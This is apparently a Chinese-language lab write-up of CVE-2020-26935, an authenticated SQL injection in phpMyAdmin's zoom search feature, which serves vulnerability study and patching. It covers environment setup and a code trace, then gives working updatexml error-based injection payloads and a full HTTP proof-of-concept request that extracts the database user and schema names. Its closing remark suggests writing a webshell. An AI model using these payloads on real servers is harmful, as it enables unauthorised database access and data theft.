CVE-2020-26935 phpMyAdmin后台SQL注入

0x00 漏洞介绍

phpMyAdmin

是

phpMyAdmin团队

的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库，创建、删除、修改数据库表，执行SQL脚本命令等。

phpMyAdmin 4.9.6之前版本

，

SearchController 5.0.3之前版本

存在SQL注入漏洞，该漏洞允许攻击者进行SQL注入攻击。

0x01 漏洞环境

• phpMyAdmin5.0.2&SearchController <5.0.3

0x02 漏洞搭建

1、

phpMyAdmin 5.0.2

压缩包下载

https://files.phpmyadmin.net/phpMyAdmin/5.0.2/phpMyAdmin-5.0.2-all-languages.zip

2、解压缩后将其放入靶机的

/var/www/html

目录下，改名为

phpmyadmin

3、随后进入

phpmyadmin

，找到

config.sample.inc.php

文件备份后将该文件更名为

config.inc.php

。用

vim

编辑器打开该文件，在第18行此处填写

phpmyadmin

，也就是自己改的名字即可安装完毕。

4、保存完配置之后，在浏览器输入如下地址http://127.0.0.1/phpmyadmin，就会出来phpMyAdmin登录界面 5、注意，mysql 5.7版本默认不能使用root用户登陆后台phpmyadmin的！！！新建一个完全权限的账户才可以登陆！！命令如下：

mysql -u root -p
use mysql;
GRANT ALL PRIVILEGES ON *.* TO '用户名'@'localhost' IDENTIFIED BY '密码' WITH GRANT OPTION;
flush privileges;
exit;
systemctl restart mysql

0x03 影响范围

phpMyAdmin versions 4.9.x before 4.9.6, and versions 5.0.x before 5.0.3

0x04 漏洞原理

1、因为是跟

SearchController

有关，所以全局搜索一下

SearchController

，正向跟进

/tbl_zoome_select.php

文件。

2、可以看出调用了

TableSearchController

的

indexAction

方法，继续跟进，全局搜索一下，看看到底是哪里创建的这个函数。

3、通过上图全局搜索

indexAction()

，可以看出来在

./libraries/classes/Controllers/Table/SearchController.php

这个文件中，进入

switch case zoom

中，发现这里是一个原生sql语句，没有对

get_data_row

做任何过滤。

0x05 漏洞复现

1、登陆phpMyAdmin后台

账号：

wpuser

密码：

Wpuser123.com

2、登陆后，点击

information_schema

3、再随机点击一张不报错的表，随后点击搜索

4、再点击

缩放搜索

、

5、将空白处填满，值都填满，随便写

6、打开BurpSuite，设置好代理后，点击下方的执行，BuiteSuite就会收到如下的数据包，

Ctrl+R

将其放入重放器（Repeater）中

7、将

token

字段后面的所有数据删除

8、添加这句语句

&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)

9、发送后可以看到结果

10、查询库名

&get_data_row=1&where_clause=updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,32),0x7e),1)
&get_data_row=1&where_clause=updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),32,32),0x7e),1)

也可以放在

Hack bar

中执行

0x06 漏洞解决建议

1、目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://github.com/phpmyadmin/phpmyadmin/commit/d09ab9bc9d634ad08b866d42bb8c4109869d38d2

2、升级到更高版本

0x07 POC

POST /phpmyadmin/tbl_zoom_select.php HTTP/1.1
Host: 192.168.91.137
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 224
Origin: null
Connection: close
Cookie: phpMyAdmin=nk6q8es96cv0j8a8a1nu9of48k; pma_lang=zh_CN; pmaUser-1=%7B%22iv%22%3A%22NnsGvlgStQthIgVzxmXmlA%3D%3D%22%2C%22mac%22%3A%22bc225fb2cce7236537f724885ff488332922da27%22%2C%22payload%22%3A%22mcoI%5C%2FCTWx3zHM6hNjpopfA%3D%3D%22%7D; pmaAuth-1=%7B%22iv%22%3A%22d1W1shXTobZeECuPiLJJXA%3D%3D%22%2C%22mac%22%3A%2237051bede50280770d4b8ab05ee03935983ad141%22%2C%22payload%22%3A%22c66OqbeSV%2BdgvyEiRm4Eh6U5wJGDBnatHyiKhkfj608%3D%22%7D
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

db=information_schema&table=CHARACTER_SETS&token=2777787a51783379543b65257c606c45&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)

0x08 总结

很鸡肋，进入

phpMyadmin

后台，谁还做sql注入，直接写shell不香么。

0x09 Reference

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26935

https://xz.aliyun.com/t/8524